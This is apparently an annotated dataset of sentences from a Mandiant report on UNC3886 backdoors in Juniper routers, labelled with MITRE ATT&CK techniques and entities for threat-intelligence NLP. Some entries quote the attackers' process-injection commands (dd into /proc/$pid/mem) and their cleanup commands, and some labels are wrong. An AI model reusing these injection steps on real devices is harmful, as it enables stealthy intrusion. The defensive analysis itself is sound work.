Frank Tse, Jakub Jozwiak, Mathew Potaczek, Logeswaran Nadarajan, Nick Harbour, Mustafa Nasser Introduction In mid 2024, Mandiant discovered threat actors deployed custom backdoors on Juniper Networks’ Junos OS routers.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "deploy custom backdoors on Juniper routers", "entities": [ { "text": "threat actors", "start": 202, "end": 215, "label": "ThreatActor" }, { "text": "backdoors", "start": 232, "end": 241, "label": "MalwareTool" }, { "text": "Juniper Networks’ Junos OS routers", "start": 245, "end": 279, "label": "Infrastructure_Indicator" }, { "text": "deployed", "start": 216, "end": 224, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s2-a25061", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "Written by: Lukasz Lamparski, Punsaen Boonyakarn, Shawn Chew, Frank Tse, Jakub Jozwiak, Mathew Potaczek, Logeswaran Nadarajan, Nick Harbour, Mustafa Nasser Introduction In mid 2024, Mandiant discovered threat actors deployed custom backdoors on Juniper Networks’ Junos OS routers.", "sentence_text": "released\nby Juniper Networks, which includes mitigations and updated signatures for the Juniper Malware Removal Tool (JMRT).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s3-5a06ed", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "released\nby Juniper Networks, which includes mitigations and updated signatures for the Juniper Malware Removal Tool (JMRT).", "sentence_text": "Organizations should run the JMRT Quick Scan and Integrity Check after the upgrade.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s4-e4a9d6", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "Organizations should run the JMRT Quick Scan and Integrity Check after the upgrade.", "sentence_text": "Juniper also\nreleased an\nadvisory\nabout this incident.\nvirtualization technologies\nand\nnetwork edge devices .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s5-7b1fb3", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "Juniper also\nreleased an\nadvisory\nabout this incident.\nvirtualization technologies\nand\nnetwork edge devices .", "sentence_text": "legitimate credentials\nto move laterally within a network, undetected.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s6-02ef45", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "legitimate credentials\nto move laterally within a network, undetected.", "sentence_text": "These objectives remained consistent but were pursued with the introduction of a new tool in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s7-c59b90", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "These objectives remained consistent but were pursued with the introduction of a new tool in 2024.", "sentence_text": "Observations in this blog post strengthen our assessment that the actor’s focus is on maintaining long-term access to victim networks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s8-eb1061", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "Observations in this blog post strengthen our assessment that the actor’s focus is on maintaining long-term access to victim networks.", "sentence_text": "UNC3886 continues to show a deep understanding of the underlying technology of the appliances being targeted.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s9-632c56", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "UNC3886 continues to show a deep understanding of the underlying technology of the appliances being targeted.", "sentence_text": "At the time of writing, Mandiant has not identified any technical overlaps between activities detailed in this blog post and those publicly reported by other parties as Volt Typhoon or Salt Typhoon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s10-fdb422", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "At the time of writing, Mandiant has not identified any technical overlaps between activities detailed in this blog post and those publicly reported by other parties as Volt Typhoon or Salt Typhoon.", "sentence_text": "Register for our upcoming webinar for a deeper dive into the activity described in this blog post.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s11-80fc88", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Register for our upcoming webinar for a deeper dive into the activity described in this blog post.", "sentence_text": "Attribution\nUNC3886 is a highly adept China-nexus cyber espionage group that has historically targeted network devices and virtualization technologies with zero-day exploits.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "target network devices and virtualization technologies with zero-day exploits", "entities": [ { "text": "UNC3886", "start": 12, "end": 19, "label": "ThreatActor" }, { "text": "network devices", "start": 103, "end": 118, "label": "Infrastructure_Indicator" }, { "text": "virtualization technologies", "start": 123, "end": 150, "label": "Infrastructure_Indicator" }, { "text": "zero-day exploits", "start": 156, "end": 173, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s12-a63973", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "Attribution\nUNC3886 is a highly adept China-nexus cyber espionage group that has historically targeted network devices and virtualization technologies with zero-day exploits.", "sentence_text": "The activity described in this blog post is the latest in a number of operations where UNC3886 has leveraged custom malware to target network devices.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "leveraged custom malware to target network devices", "entities": [ { "text": "UNC3886", "start": 87, "end": 94, "label": "ThreatActor" }, { "text": "custom malware", "start": 109, "end": 123, "label": "MalwareTool" }, { "text": "network devices", "start": 134, "end": 149, "label": "Infrastructure_Indicator" }, { "text": "leveraged", "start": 99, "end": 108, "label": "Action" }, { "text": "target", "start": 127, "end": 133, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s13-837fde", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "The activity described in this blog post is the latest in a number of operations where UNC3886 has leveraged custom malware to target network devices.", "sentence_text": "The malware deployed on Juniper Networks’ Junos OS routers demonstrates that UNC3886 has in-depth knowledge of advanced system internals.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505", "name": "Server Software Component" } ], "procedure": "deploy malware on Juniper Junos OS routers", "entities": [ { "text": "UNC3886", "start": 77, "end": 84, "label": "ThreatActor" }, { "text": "malware", "start": 4, "end": 11, "label": "MalwareTool" }, { "text": "Juniper Networks’ Junos OS routers", "start": 24, "end": 58, "label": "Infrastructure_Indicator" }, { "text": "deployed", "start": 12, "end": 20, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s14-cd307b", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "The malware deployed on Juniper Networks’ Junos OS routers demonstrates that UNC3886 has in-depth knowledge of advanced system internals.", "sentence_text": "Furthermore, UNC3886 continues to prioritize stealth in its operations through the use of passive backdoors, together with log and forensics artifact tampering, indicating a focus on long-term persistence, while minimizing the risk of detection.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" }, { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "use passive backdoors and tamper with logs/forensics artifacts", "entities": [ { "text": "UNC3886", "start": 13, "end": 20, "label": "ThreatActor" }, { "text": "passive backdoors", "start": 90, "end": 107, "label": "MalwareTool" }, { "text": "log and forensics artifact tampering", "start": 123, "end": 159, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s15-2046e2", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "Furthermore, UNC3886 continues to prioritize stealth in its operations through the use of passive backdoors, together with log and forensics artifact tampering, indicating a focus on long-term persistence, while minimizing the risk of detection.", "sentence_text": "It is based on a modified FreeBSD operating system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s16-fedc1a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "It is based on a modified FreeBSD operating system.", "sentence_text": "Junos OS supports 2 different modes of operations:\nCLI mode:\nwhere standard Junos OS CLI commands can be issued Shell mode:\na user with shell access privileges can access an underlying FreeBSD shell and issue standard FreeBSD commands.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s17-04dea8", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Junos OS supports 2 different modes of operations:\nCLI mode:\nwhere standard Junos OS CLI commands can be issued Shell mode:\na user with shell access privileges can access an underlying FreeBSD shell and issue standard FreeBSD commands.", "sentence_text": "Malware identified in this blog post primarily relies on access to the csh shell, but in some cases it is also aware of higher layers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s18-ddd1bd", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Malware identified in this blog post primarily relies on access to the csh shell, but in some cases it is also aware of higher layers.", "sentence_text": "Veriexec\nJunos OS incorporates a Verified Exec (veriexec)\nsubsystem, which is a modified version of an original NetBSD Veriexec Subsystem .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s19-be82c9", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "Veriexec\nJunos OS incorporates a Verified Exec (veriexec)\nsubsystem, which is a modified version of an original NetBSD Veriexec Subsystem .", "sentence_text": "To run malware, the threat actor first needed to bypass veriexec protection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1562.001", "name": "Disable or Modify Tools" } ], "procedure": "bypass veriexec protection to run malware", "entities": [ { "text": "threat actor", "start": 20, "end": 32, "label": "ThreatActor" }, { "text": "malware", "start": 7, "end": 14, "label": "MalwareTool" }, { "text": "veriexec protection", "start": 56, "end": 75, "label": "Infrastructure_Indicator" }, { "text": "bypass", "start": 49, "end": 55, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s20-04d2bd", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "To run malware, the threat actor first needed to bypass veriexec protection.", "sentence_text": "Circumventing Veriexec with Process Injection Veriexec protection prevents unauthorized binaries from executing.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "Circumvent Veriexec with Process Injection", "entities": [ { "text": "Veriexec", "start": 14, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "Veriexec protection", "start": 46, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "Process Injection", "start": 28, "end": 45, "label": "Action" }, { "text": "prevents unauthorized binaries from executing", "start": 66, "end": 111, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s21-b84d1f", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "Circumventing Veriexec with Process Injection Veriexec protection prevents unauthorized binaries from executing.", "sentence_text": "This poses a challenge for threat actors, as disabling veriexec can trigger alerts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s22-1b687b", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "This poses a challenge for threat actors, as disabling veriexec can trigger alerts.", "sentence_text": "However, execution of untrusted code is still possible if it occurs within the context of a trusted process.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "execution of untrusted code within the context of a trusted process", "entities": [ { "text": "untrusted code", "start": 22, "end": 36, "label": "MalwareTool" }, { "text": "trusted process", "start": 92, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "execution", "start": 9, "end": 18, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s23-a6ee98", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "However, execution of untrusted code is still possible if it occurs within the context of a trusted process.", "sentence_text": "This specific technique is now tracked as CVE-2025-21590, as detailed in Juniper Network’s security bulletin JSA93446", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s24-1c92bf", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "This specific technique is now tracked as CVE-2025-21590, as detailed in Juniper Network’s security bulletin JSA93446", "sentence_text": "Within the shell environment, they used the “here document” feature to generate a Base64-encoded file named ldb.b64 .", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027.001", "name": "Binary Padding" } ], "procedure": "generate a Base64-encoded file ldb.b64 using a here document", "entities": [ { "text": "ldb.b64", "start": 108, "end": 115, "label": "MalwareTool" }, { "text": "Base64-encoded", "start": 82, "end": 96, "label": "Action" }, { "text": "shell environment", "start": 11, "end": 28, "label": "Infrastructure_Indicator" }, { "text": "used", "start": 35, "end": 39, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s25-d12fea", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "Within the shell environment, they used the “here document” feature to generate a Base64-encoded file named ldb.b64 .", "sentence_text": "This encoded file was then decoded using base64 to create a compressed archive named ldb.tar.gz , which was subsequently decompressed and extracted using the gunzip and tar utilities to extract malicious binaries.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "decoded using base64 and extracted using gunzip and tar to extract malicious binaries", "entities": [ { "text": "ldb.tar.gz", "start": 85, "end": 95, "label": "MalwareTool" }, { "text": "binaries", "start": 204, "end": 212, "label": "MalwareTool" }, { "text": "decoded", "start": 27, "end": 34, "label": "Action" }, { "text": "decompressed", "start": 121, "end": 133, "label": "Action" }, { "text": "extracted", "start": 138, "end": 147, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s26-6d4027", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "This encoded file was then decoded using base64 to create a compressed archive named ldb.tar.gz , which was subsequently decompressed and extracted using the gunzip and tar utilities to extract malicious binaries.", "sentence_text": "ldb.b64\nor\nldb.tar.gz\non the compromised Juniper routers' file system.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s27-c27f20", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "ldb.b64\nor\nldb.tar.gz\non the compromised Juniper routers' file system.", "sentence_text": "However, Mandiant successfully recovered three malicious payloads by performing analysis on the memory of a compromised router.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "recovered malicious payloads from the memory of a compromised router", "entities": [ { "text": "Mandiant ", "start": 9, "end": 18, "label": "ThreatActor" }, { "text": "malicious payloads", "start": 47, "end": 65, "label": "MalwareTool" }, { "text": "compromised router", "start": 108, "end": 126, "label": "Infrastructure_Indicator" }, { "text": "recovered", "start": 31, "end": 40, "label": "Action" }, { "text": "performing analysis on the memory", "start": 69, "end": 102, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s28-f4405c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "However, Mandiant successfully recovered three malicious payloads by performing analysis on the memory of a compromised router.", "sentence_text": "The purpose of the payloads was as follows:\nloader.bin\nis a shellcode loader responsible for loading functions including exit , mmap , open , read , and close from a standard library libc.so.7 , allocating memory, and loading and executing the final payload from payload.bin pc.bin contains a memory address 0x4012f0 payload.bin was identified to be the Position Independent Code (PIC) version of the lmpad backdoor Details of lmpad backdoor are covered in the Malware Analysis section.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1106", "name": "Native API" } ], "procedure": "loader.bin loads libc functions to allocate memory and execute the lmpad backdoor", "entities": [ { "text": "payloads", "start": 19, "end": 27, "label": "MalwareTool" }, { "text": "loader.bin", "start": 44, "end": 54, "label": "MalwareTool" }, { "text": "payload.bin", "start": 317, "end": 328, "label": "MalwareTool" }, { "text": "lmpad backdoor", "start": 401, "end": 415, "label": "MalwareTool" }, { "text": "libc.so.7", "start": 183, "end": 192, "label": "Infrastructure_Indicator" }, { "text": "loading", "start": 93, "end": 100, "label": "Action" }, { "text": "allocating memory", "start": 195, "end": 212, "label": "Action" }, { "text": "executing", "start": 230, "end": 239, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s29-4d4057", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "The purpose of the payloads was as follows:\nloader.bin\nis a shellcode loader responsible for loading functions including exit , mmap , open , read , and close from a standard library libc.so.7 , allocating memory, and loading and executing the final payload from payload.bin pc.bin contains a memory address 0x4012f0 payload.bin was identified to be the Position Independent Code (PIC) version of the lmpad backdoor Details of lmpad backdoor are covered in the Malware Analysis section.", "sentence_text": "cat\nprocess.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s30-9682ae", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "cat\nprocess.", "sentence_text": "The actor created a named pipe called null using mkfifo and used cat to continuously read from it, effectively creating a hung process.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "create a named pipe 'null' and use 'cat' to create a hung process", "entities": [ { "text": "mkfifo", "start": 49, "end": 55, "label": "MalwareTool" }, { "text": "cat", "start": 65, "end": 68, "label": "MalwareTool" }, { "text": "null", "start": 38, "end": 42, "label": "Infrastructure_Indicator" }, { "text": "created a named pipe", "start": 10, "end": 30, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s31-2f5696", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "The actor created a named pipe called null using mkfifo and used cat to continuously read from it, effectively creating a hung process.", "sentence_text": "This stage involved the following commands:\nrm -rf null;\nmkfifo null;\ncat null & set pid=$!\necho \" $pid\" While the hung cat process was waiting for data from the null pipe, the threat actor leveraged dd to read binary data from the payload files and write it to specific memory locations inside the cat process.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "use dd to write payload data into the memory of a hung cat process", "entities": [ { "text": "threat actor", "start": 177, "end": 189, "label": "ThreatActor" }, { "text": "payload files", "start": 232, "end": 245, "label": "MalwareTool" }, { "text": "null", "start": 162, "end": 166, "label": "Action" }, { "text": "cat process", "start": 120, "end": 131, "label": "Infrastructure_Indicator" }, { "text": "null pipe", "start": 162, "end": 171, "label": "Infrastructure_Indicator" }, { "text": "write it to specific memory locations", "start": 250, "end": 287, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s32-e82c7c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 32, "context_before": "This stage involved the following commands:\nrm -rf null;\nmkfifo null;\ncat null & set pid=$!\necho \" $pid\" While the hung cat process was waiting for data from the null pipe, the threat actor leveraged dd to read binary data from the payload files and write it to specific memory locations inside the cat process.", "sentence_text": "dd if=loader.bin of=/proc/$pid/mem conv=notrunc obs=1", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "inject loader.bin into process memory using dd", "entities": [ { "text": "loader.bin", "start": 6, "end": 16, "label": "MalwareTool" }, { "text": "/proc/$pid/mem", "start": 20, "end": 34, "label": "Infrastructure_Indicator" }, { "text": "dd", "start": 0, "end": 2, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s33-2d27bc", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 33, "context_before": "dd if=loader.bin of=/proc/$pid/mem conv=notrunc obs=1", "sentence_text": "oseek=0x4012f0 dd if=pc.bin of=/proc/$pid/mem conv=notrunc obs=1", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "inject pc.bin at memory address 0x4012f0 using dd", "entities": [ { "text": "pc.bin", "start": 21, "end": 27, "label": "MalwareTool" }, { "text": "/proc/$pid/mem", "start": 31, "end": 45, "label": "Infrastructure_Indicator" }, { "text": "dd", "start": 15, "end": 17, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s34-05a54a", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 34, "context_before": "oseek=0x4012f0 dd if=pc.bin of=/proc/$pid/mem conv=notrunc obs=1", "sentence_text": "oseek=0x602820 The first dd command wrote the loader code from loader.bin at the virtual address 0x4012f0, which is the entrypoint of cat .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "inject loader code at the entrypoint of cat process", "entities": [ { "text": "loader code", "start": 46, "end": 57, "label": "MalwareTool" }, { "text": "loader.bin", "start": 63, "end": 73, "label": "MalwareTool" }, { "text": "oseek=0x602820", "start": 0, "end": 14, "label": "Infrastructure_Indicator" }, { "text": "0x4012f0", "start": 97, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "cat", "start": 134, "end": 137, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-93_mitre_report-p1-s35-790f25", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 35, "context_before": "oseek=0x602820 The first dd command wrote the loader code from loader.bin at the virtual address 0x4012f0, which is the entrypoint of cat .", "sentence_text": "The second dd command replaced data at 0x602820 with the content of pc.bin .", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "dd command replaced data at 0x602820 with content of pc.bin", "entities": [ { "text": "pc.bin", "start": 68, "end": 74, "label": "MalwareTool" }, { "text": "0x602820", "start": 39, "end": 47, "label": "Infrastructure_Indicator" }, { "text": "replaced data", "start": 22, "end": 35, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s36-d38327", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 36, "context_before": "The second dd command replaced data at 0x602820 with the content of pc.bin .", "sentence_text": "The threat actor sent an empty string using echo to the null pipe.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "send empty string to null pipe to trigger execution", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "null pipe", "start": 56, "end": 65, "label": "Infrastructure_Indicator" }, { "text": "sent an empty string using echo", "start": 17, "end": 48, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s37-d3d587", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 37, "context_before": "The threat actor sent an empty string using echo to the null pipe.", "sentence_text": "cat\nreceived an end-of-file signal after echo finished writing the data and attempted to close the file by executing fclose As the global offset table entry for fclose function was replaced with the entrypoint to the shellcode loader, cat executed the shellcode loader instead of the actual fclose function, and ultimately loaded the final payload from payload.bin in the same directory.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574", "name": "Hijack Execution Flow" } ], "procedure": "hijack fclose GOT entry to execute shellcode loader and load payload.bin", "entities": [ { "text": "shellcode loader", "start": 217, "end": 233, "label": "MalwareTool" }, { "text": "payload", "start": 340, "end": 347, "label": "MalwareTool" }, { "text": "payload.bin", "start": 353, "end": 364, "label": "MalwareTool" }, { "text": "cat", "start": 0, "end": 3, "label": "Infrastructure_Indicator" }, { "text": "fclose function", "start": 161, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "echo", "start": 41, "end": 45, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s38-1780ac", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 38, "context_before": "cat\nreceived an end-of-file signal after echo finished writing the data and attempted to close the file by executing fclose As the global offset table entry for fclose function was replaced with the entrypoint to the shellcode loader, cat executed the shellcode loader instead of the actual fclose function, and ultimately loaded the final payload from payload.bin in the same directory.", "sentence_text": "After\npayload.bin\nhas been loaded, the threat actor removed the null file and the ldb directory, then terminated the current session.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "remove null file and ldb directory after payload execution", "entities": [ { "text": "threat actor", "start": 39, "end": 51, "label": "ThreatActor" }, { "text": "payload.bin", "start": 6, "end": 17, "label": "MalwareTool" }, { "text": "null file", "start": 64, "end": 73, "label": "Infrastructure_Indicator" }, { "text": "ldb directory", "start": 82, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "removed", "start": 52, "end": 59, "label": "Action" }, { "text": "terminated", "start": 102, "end": 112, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s39-032d19", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 39, "context_before": "After\npayload.bin\nhas been loaded, the threat actor removed the null file and the ldb directory, then terminated the current session.", "sentence_text": "This left only the legitimate process running on the compromised router, now containing the malicious code.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1055", "name": "Process Injection" } ], "procedure": "legitimate process running on the router now containing malicious code", "entities": [ { "text": "process", "start": 30, "end": 37, "label": "Infrastructure_Indicator" }, { "text": "compromised router", "start": 53, "end": 71, "label": "Infrastructure_Indicator" }, { "text": "malicious code", "start": 92, "end": 106, "label": "MalwareTool" }, { "text": "running", "start": 38, "end": 45, "label": "Action" }, { "text": "containing", "start": 77, "end": 87, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s40-b0be3c", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 40, "context_before": "This left only the legitimate process running on the compromised router, now containing the malicious code.", "sentence_text": "The following commands were used to achieve these actions:\nsleep 1;echo -n>null;sleep 1;rm -rf null cd ..", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "None", "entities": [ { "text": "sleep", "start": 59, "end": 64, "label": "MalwareTool" }, { "text": "echo", "start": 67, "end": 71, "label": "MalwareTool" }, { "text": "rm", "start": 88, "end": 90, "label": "MalwareTool" }, { "text": "cd", "start": 100, "end": 102, "label": "MalwareTool" }, { "text": "used to achieve these actions", "start": 28, "end": 57, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s41-b0f8e0", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 41, "context_before": "The following commands were used to achieve these actions:\nsleep 1;echo -n>null;sleep 1;rm -rf null cd ..", "sentence_text": "rm -rf ldb kill -9 $$ Malware Overview", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-93_mitre_report-p1-s42-b897fb", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 42, "context_before": "rm -rf ldb kill -9 $$ Malware Overview", "sentence_text": "The standard set of TINYSHELL commands comprises of:\nRemote file upload Remote file download Establishing remote shell session", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Remote file upload, Remote file download, Establishing remote shell session", "entities": [ { "text": "TINYSHELL", "start": 20, "end": 29, "label": "MalwareTool" }, { "text": "upload", "start": 65, "end": 71, "label": "Action" }, { "text": "download", "start": 84, "end": 92, "label": "Action" }, { "text": "Establishing remote shell session", "start": 93, "end": 126, "label": "Action" } ] }, { "uid": "mitre-93_mitre_report-p1-s43-ce3ca7", "source": "mitre", "doc_id": "93_mitre_report", "page_number": 1, "sentence_id": 43, "context_before": "The standard set of TINYSHELL commands comprises of:\nRemote file upload Remote file download Establishing remote shell session", "sentence_text": "A basic TINYSHELL implementation for FreeBSD seems to be a foundation for heavily customized backdoors detailed as follows.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "TINYSHELL implementation for FreeBSD seems to be a foundation for heavily customized backdoors", "entities": [ { "text": "TINYSHELL", 